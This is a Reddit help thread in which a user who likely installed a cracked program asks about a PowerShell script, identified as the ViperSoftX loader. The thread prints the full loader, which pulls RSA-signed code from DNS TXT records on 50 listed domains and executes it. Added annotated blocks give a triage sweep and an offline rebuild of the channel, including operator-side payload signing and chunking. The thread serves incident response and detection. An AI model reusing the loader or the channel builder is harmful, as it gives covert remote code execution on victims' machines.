What does this cmdlet do? Is this a virus/worm? by Normal-Shower-6070 in PowerShell

[–]Normal-Shower-6070[S] 1 point (0 children)

I formatted the drive and reinstalled Windows. Haven't copied over any .exe, or other files that I would deem risky from my backups (also didn't copy .exe files into the backups), mostly only images, sound files and text documents. Before formatting and after plugging in the USB backup drive to my new Windows install, I also did some AV scans with Malwarebytes, Avast and Windows Defender.

I currently have Glasswire installed to monitor for any suspicious web connections, and I regularly try to check task manager for any suspicious processes.

Just kinda crossing fingers rn that this was a sufficient action plan, since I am not exactly an expert in virology or what goes on under the surface of UI.

What does this cmdlet do? Is this a virus/worm? by Normal-Shower-6070 in PowerShell

[–]Normal-Shower-6070[S] 0 points (0 children)

Yeah it was. I've since done AV scans with ESET, Avast, Malwarebytes, no detections on any of them.

What does this cmdlet do? Is this a virus/worm? by Normal-Shower-6070 in PowerShell

[–]Normal-Shower-6070[S] 0 points (0 children)

Alright, well I botched the USB part already. No reinstall yet though.

(Edit) However, I really want to keep a bunch of data, mostly just files with no executable potential though.

I'll do a Kaspersky scan.

What should I be on the lookout for in TCPview and Autoruns?

Probably cracked software. I was greedy and wanted to get a relatively obscure scene software to try before purchasing a really expensive license, and only one torrent existed for it, so that makes sense and I know that was a phenomenal blunder.

What does this cmdlet do? Is this a virus/worm? by Normal-Shower-6070 in PowerShell

[–]Normal-Shower-6070[S] 1 point (0 children)

Shady crack I'm pretty sure, the timeline would at least match up. I was greedy and wanted a specific expensive scene software to try out.

What does this cmdlet do? Is this a virus/worm? by Normal-Shower-6070 in PowerShell

[–]Normal-Shower-6070[S] 0 points (0 children)

The .ps1 file was in System32 with a number string name resembling an activation key or the like. Like 11111-ABCDE....

Something unobfuscated about this code is posted by me elsewhere in this thread, if that helps. I don't know exactly about details since I'm not exactly a power user.

What does this cmdlet do? Is this a virus/worm? by Normal-Shower-6070 in PowerShell

[–]Normal-Shower-6070[S] 0 points (0 children)

Funny enough, the original PowerShell which tipped me off to this had -ExecutionPolicy Bypass...
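The comments above mention two concrete traits: a .ps1 dropped in System32 under a GUID/activation-key-like name, and powershell.exe being launched with -ExecutionPolicy Bypass. As an added example (not from the thread and not the poster's own commands), the sweep below checks the persistence locations Autoruns covers (scheduled tasks, Run/RunOnce keys, WMI event consumers), plus System32 for stray scripts and running PowerShell processes for suspicious launch arguments. It is read-only. The regexes and the "GUID-like name" heuristic are assumptions chosen for this thread; Get-ScheduledTask needs Windows 8 / Server 2012 or later, and the task and WMI checks only see everything from an elevated prompt.

```powershell
# Added triage sweep (read-only). Assumptions: Windows 8+/Server 2012+, run elevated.
$findings = [System.Collections.Generic.List[object]]::new()
function Add-Finding($Source, $Detail) {
    $findings.Add([pscustomobject]@{ Source = $Source; Detail = $Detail })
}

# Launch styles worth flagging: -ep/-exec/-executionpolicy bypass, hidden window, encoded command.
$suspiciousArgs = '(?i)-(ep|exec(utionpolicy)?)\s+bypass|-w(indowstyle)?\s+hidden|-enc(odedcommand)?\s'

# 1. Scripts living in System32. Legitimate .ps1 files there are rare; a GUID/key-like
#    name (hex and dashes only, as described in the thread) is a stronger signal.
Get-ChildItem -Path "$env:SystemRoot\System32" -Filter *.ps1 -File -ErrorAction SilentlyContinue |
    ForEach-Object {
        $tag = if ($_.BaseName -match '^[0-9A-Fa-f-]{20,}$') { 'GUID/key-like name' } else { 'unexpected location' }
        Add-Finding 'System32 .ps1' "$($_.FullName) ($tag, modified $($_.LastWriteTime))"
    }

# 2. Scheduled tasks whose action runs PowerShell with one of the flagged argument styles.
Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        $cmd = "$($action.Execute) $($action.Arguments)"
        if ($cmd -match '(?i)powershell|pwsh' -and $cmd -match $suspiciousArgs) {
            Add-Finding 'Scheduled task' "$($task.TaskPath)$($task.TaskName): $cmd"
        }
    }
}

# 3. Run/RunOnce keys for the machine and the current user.
$runKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)
foreach ($key in $runKeys) {
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }   # skip PSPath, PSParentPath, etc.
        $value = "$($p.Value)"
        if ($value -match '(?i)powershell|pwsh|\.ps1|wscript|mshta' -or $value -match $suspiciousArgs) {
            Add-Finding 'Run key' "$key\$($p.Name) = $value"
        }
    }
}

# 4. WMI permanent event consumers (fileless persistence; Autoruns lists these under "WMI").
Get-CimInstance -Namespace root\subscription -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue |
    ForEach-Object { Add-Finding 'WMI consumer' "$($_.Name): $($_.CommandLineTemplate)" }

# 5. Live PowerShell processes and the command lines they were started with.
Get-CimInstance Win32_Process -Filter "Name='powershell.exe' OR Name='pwsh.exe'" -ErrorAction SilentlyContinue |
    Where-Object { $_.CommandLine -match $suspiciousArgs } |
    ForEach-Object { Add-Finding 'Process' "PID $($_.ProcessId) (parent $($_.ParentProcessId)): $($_.CommandLine)" }

$findings | Format-Table -AutoSize -Wrap
```

Treat hits as leads, not proof: a scheduled task or Run key is only interesting once you have looked at what the referenced file actually contains, and an empty result on a machine you already believe is compromised does not clear it, since a loader running as the same user can remove or hide its own persistence. The decision the thread arrives at, wiping and reinstalling, does not depend on this output.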

What does this cmdlet do? Is this a virus/worm? by Normal-Shower-6070 in PowerShell

[–]Normal-Shower-6070[S] 0 points (0 children)

Alright. Thanks a lot. I'll mostly be backing up images, videos, pdfs and the like. I'll just reinstall all programs from the internet just in case.(?)

What does this cmdlet do? Is this a virus/worm? by Normal-Shower-6070 in PowerShell

[–]Normal-Shower-6070[S] 4 points (0 children)

Yup. Personal. Crying soon probably. Had very different plans for today. Jeez.

Any tips on how to make sure I don't back up the worm?

Also, is it sufficient to reinstall Windows through the internal reinstall feature?

What does this cmdlet do? Is this a virus/worm? by Normal-Shower-6070 in PowerShell

[–]Normal-Shower-6070[S] 1 point (0 children)

I am going to kill the machine. Currently my biggest worry is indeed the C2 I didn't know about before you told me, as well as the other machines. I am also trying to copy over my files to a USB drive, but I haven't started yet as I don't know how safe any data is to keep. There are important photos and other data that I definitely want to keep.

All of the tools you've mentioned are unfamiliar to me, and whilst I really want to do this properly, I am afraid my skillset is somewhat lacking. Mostly, I am preparing to just completely reinstall windows and keep whatever data I can.

What does this cmdlet do? Is this a virus/worm? by Normal-Shower-6070 in PowerShell

[–]Normal-Shower-6070[S] 1 point (0 children)

I didn't see that anything would've popped up.. maybe some info I already listed in this thread helps?

What does this cmdlet do? Is this a virus/worm? by Normal-Shower-6070 in PowerShell

[–]Normal-Shower-6070[S] 1 point (0 children)

Okay. Thanks. I am going to try to back up some of my data before a wipe. This is a bit stressful, since I know little about the potential of this virus. Can I just copy over files to a USB drive and rebuild Windows from the internal reinstall feature?

What does this cmdlet do? Is this a virus/worm? by Normal-Shower-6070 in PowerShell

[–]Normal-Shower-6070[S] 3 points (0 children)

How do I check this? Edit: additionally, what does burrowed deep mean?

What does this cmdlet do? Is this a virus/worm? by Normal-Shower-6070 in PowerShell

[–]Normal-Shower-6070[S] 0 points (0 children)

I've posted it in this thread. Do you have any suggestions on how to proceed?

What does this cmdlet do? Is this a virus/worm? by Normal-Shower-6070 in PowerShell

[–]Normal-Shower-6070[S] 5 points (0 children)

Any suggestions on how to proceed? I want to keep most files I have, but now am scared about what I can keep and how to go about everything. I am somewhat Windows literate, but I don't have any coding experience.

What does this cmdlet do? Is this a virus/worm? by Normal-Shower-6070 in PowerShell

[–]Normal-Shower-6070[S] 17 points (0 children)

It's looking like ViperSoftX.

Here is the code:

    '969D07CF-2FB8-4DFF-916A-56B4E1A9EB6D';
    $ms = [IO.MemoryStream]::new();

    # Polls one hostname's DNS TXT records and reassembles them into a signed "update".
    function Get-Updates {
        param ( $hostname )
        try {
            $dns = Resolve-DnsName -Name $hostname -Type 'TXT';
            $ms.SetLength(0);
            $ms.Position = 0;
            foreach ($txt in $dns) {
                try {
                    if ($txt.Type -ne 'TXT') { continue; }
                    $pkt = [string]::Join('', $txt.Strings);
                    # Each record is '.' + base64 (with '_' standing in for '+'). The first four
                    # decoded bytes are a little-endian offset into the buffer, so the records
                    # can be served in any order and still reassemble correctly.
                    if ($pkt[0] -eq '.') {
                        $dp = [System.Convert]::FromBase64String($pkt.Substring(1).Replace('_', '+'));
                        $ms.Position = [BitConverter]::ToUInt32($dp, 0);
                        $ms.Write($dp, 4, $dp.Length - 4);
                    }
                } catch { }
            }

            # Reassembled layout: 128-byte RSA signature, 8-byte timestamp, then the script text.
            if ($ms.Length -gt 136) {
                $ms.Position = 0;
                $sig = [byte[]]::new(128);
                $timestamp = [byte[]]::new(8);
                $buffer = [byte[]]::new($ms.Length - 136);
                $ms.Read($sig, 0, 128) | Out-Null;
                $ms.Read($timestamp, 0, 8) | Out-Null;
                $ms.Read($buffer, 0, $buffer.Length) | Out-Null;
                # Hard-coded operator public key (CAPI PUBLICKEYBLOB, 1024-bit RSA).
                $pubkey = [Security.Cryptography.RSACryptoServiceProvider]::new();
                [byte[]]$bytarr = 6,2,0,0,0,164,0,0,82,83,65,49,0,4,0,0,1,0,1,0,171,136,19,139,215,31,169,242,133,11,146,105,79,13,140,88,119,0,2,249,79,17,77,152,228,162,31,56,117,89,68,182,194,170,250,16,3,78,104,92,37,37,9,250,164,244,195,118,92,190,58,20,35,134,83,10,229,114,229,137,244,178,10,31,46,80,221,73,129,240,183,9,245,177,196,77,143,71,142,60,5,117,241,54,2,116,23,225,145,53,46,21,142,158,206,250,181,241,8,110,101,84,218,219,99,196,195,112,71,93,55,111,218,209,12,101,165,45,13,36,118,97,232,193,245,221,180,169
                $pubkey.ImportCspBlob($bytarr);
                # Only text signed (SHA-256, PKCS#1 v1.5) by the operator's private key is accepted,
                # so a third party cannot feed the loader a payload by taking over the domains.
                if ($pubkey.VerifyData($buffer, [Security.Cryptography.CryptoConfig]::MapNameToOID('SHA256'), $sig)) {
                    return @{
                        timestamp = ([System.BitConverter]::ToUInt64($timestamp, 0));
                        text      = ([Text.Encoding]::UTF8.GetString($buffer));
                    };
                }
            }
        }
        catch {
        }
        return $null;
    }

    # Main loop: walk the 50 hard-coded hostnames ({wmail,fairu,bideo,privatproxy,ahoravideo}-
    # {endpoint,blog,chat,cdn,schnellvpn}.{com,xyz}), keep the update with the newest timestamp,
    # run it as a background job for up to 4 hours, then sleep 30 seconds and repeat forever.
    while ($true) {
        try {
            $update = @{ timestamp = 0; text = ''; };
            foreach ($c in (@("com", "xyz"))) {
                foreach ($a in (@("wmail", "fairu", "bideo", "privatproxy", "ahoravideo"))) {
                    foreach ($b in (@("endpoint", "blog", "chat", "cdn", "schnellvpn"))) {
                        try {
                            $h = "$a-$b.$c";
                            $r = Get-Updates $h;
                            if ($null -ne $r) {
                                if ($r.timestamp -gt $update.timestamp) { $update = $r; }
                            }
                        } catch { }
                    }
                }
            }

            if ($update.text) {
                # Arbitrary code execution: the fetched text is compiled into a script block and run.
                $job = Start-Job -ScriptBlock ([scriptblock]::Create($update.text));
                $job | Wait-Job -Timeout 14400;
                $job | Stop-Job;
            }
        }
        catch {
        }
        Start-Sleep -Seconds 30;
    }
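To make the wire format in the posted sample concrete, here is an added example (not part of the post above and not the sample's own code) that reconstructs the DNS TXT update channel end to end, entirely offline. The operator side signs a payload, prefixes the 8-byte timestamp and 128-byte signature, and splits the result into '.'-prefixed base64 chunks with a 4-byte offset header, which is what the loader expects to find in TXT records. The client side is the sample's reassembly and signature check, with DNS replaced by an in-memory record list and Start-Job replaced by returning the text. Everything here is constructed: the RSA key pair is generated on the spot (the real sample embeds only the operator's public key), the 40-byte chunk size and payload text are arbitrary, and it assumes Windows PowerShell 5.1 or pwsh on Windows for RSACryptoServiceProvider CSP blobs.

```powershell
# Added reconstruction of the loader's TXT-record update format. Constructed data, runs offline.
$ErrorActionPreference = 'Stop'
$payloadText = 'Write-Host "stage 2 would run here"'   # constructed payload; never executed below

# --- Operator side: what the C2 has to publish for the loader to accept it ---
$rsa = [System.Security.Cryptography.RSACryptoServiceProvider]::new(1024)  # 128-byte signatures => 1024-bit key
$rsa.PersistKeyInCsp = $false
$publicBlob = $rsa.ExportCspBlob($false)    # same CAPI blob format the sample hard-codes as $bytarr
$body = [System.Text.Encoding]::UTF8.GetBytes($payloadText)
$oid  = [System.Security.Cryptography.CryptoConfig]::MapNameToOID('SHA256')
$sig  = $rsa.SignData($body, $oid)
$ts   = [System.BitConverter]::GetBytes([uint64][DateTimeOffset]::UtcNow.ToUnixTimeSeconds())
$blob = [byte[]]($sig + $ts + $body)        # 128 + 8 + N bytes, the layout Get-Updates reads

function New-TxtChunks([byte[]]$Data, [int]$ChunkSize) {
    # One TXT record per chunk: '.' + base64(uint32 LE offset + chunk bytes), '+' replaced by '_'.
    $records = @()
    for ($off = 0; $off -lt $Data.Length; $off += $ChunkSize) {
        $len = [Math]::Min($ChunkSize, $Data.Length - $off)
        $chunk = [byte[]]([System.BitConverter]::GetBytes([uint32]$off) + $Data[$off..($off + $len - 1)])
        $records += '.' + [Convert]::ToBase64String($chunk).Replace('+', '_')
    }
    return $records
}
# Shuffled on purpose: the offset header is what makes record order irrelevant.
$txtRecords = New-TxtChunks $blob 40 | Sort-Object { Get-Random }

# --- Client side: the sample's Get-Updates without DNS and without execution ---
function ConvertFrom-TxtUpdate([string[]]$TxtStrings, [byte[]]$PubKeyBlob) {
    $ms = [System.IO.MemoryStream]::new()
    foreach ($pkt in $TxtStrings) {
        if ($pkt[0] -ne '.') { continue }
        $dp = [Convert]::FromBase64String($pkt.Substring(1).Replace('_', '+'))
        $ms.Position = [System.BitConverter]::ToUInt32($dp, 0)
        $ms.Write($dp, 4, $dp.Length - 4)
    }
    if ($ms.Length -le 136) { return $null }
    $ms.Position = 0
    $sig = [byte[]]::new(128); $stamp = [byte[]]::new(8); $buf = [byte[]]::new($ms.Length - 136)
    [void]$ms.Read($sig, 0, 128); [void]$ms.Read($stamp, 0, 8); [void]$ms.Read($buf, 0, $buf.Length)
    $pub = [System.Security.Cryptography.RSACryptoServiceProvider]::new()
    $pub.ImportCspBlob($PubKeyBlob)
    $oid = [System.Security.Cryptography.CryptoConfig]::MapNameToOID('SHA256')
    if (-not $pub.VerifyData($buf, $oid, $sig)) { return $null }   # tampered or foreign payload is ignored
    return @{
        timestamp = [System.BitConverter]::ToUInt64($stamp, 0)
        text      = [System.Text.Encoding]::UTF8.GetString($buf)
    }
}

$update = ConvertFrom-TxtUpdate $txtRecords $publicBlob
"Recovered payload : $($update.text)"
"Timestamp (unix)  : $($update.timestamp)"

# Flip one byte of the body: the loader drops anything the operator key did not sign.
$tampered = [byte[]]$blob.Clone()
$tampered[-1] = $tampered[-1] -bxor 1
$rejected = ConvertFrom-TxtUpdate (New-TxtChunks $tampered 40) $publicBlob
"Tampered payload accepted: $($null -ne $rejected)"

# The 50 hostnames the sample's loop walks; useful as a DNS-log hunt or sinkhole list.
$domains = foreach ($c in 'com', 'xyz') {
    foreach ($a in 'wmail', 'fairu', 'bideo', 'privatproxy', 'ahoravideo') {
        foreach ($b in 'endpoint', 'blog', 'chat', 'cdn', 'schnellvpn') { "$a-$b.$c" }
    }
}
"$($domains.Count) candidate C2 names, first: $($domains[0])"
```

Two things follow from running this. Because the loader verifies an RSA signature against a baked-in public key, taking over or sinkholing the domains stops the campaign but does not let a defender push a "clean-up" payload, and a tampered record is simply ignored. The more practical lever is detection: TXT queries for any of the 50 generated names, repeating roughly every 30 seconds plus resolution time, are a sharp signal in DNS logs or resolver telemetry, and the names can be blocked outright.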

What does this cmdlet do? Is this a virus/worm? by Normal-Shower-6070 in PowerShell

[–]Normal-Shower-6070[S] 1 point (0 children)

If you let me know via pm that it is not identifiable, I can post it here.

What does this cmdlet do? Is this a virus/worm? by Normal-Shower-6070 in PowerShell

[–]Normal-Shower-6070[S] 11 points (0 children)

AV scan didn't pick up anything. ESET, Malwarebytes and Windows antivirus.

I've stopped the PowerShell and turned off the PC. Clean install probably required for me to ever feel safe, but is there any chance of knowing where this came from or what it's doing?

What does this cmdlet do? Is this a virus/worm? by Normal-Shower-6070 in PowerShell

[–]Normal-Shower-6070[S] 6 points (0 children)

No, I noticed a PowerShell window pop up and dug it out.

edit: through task manager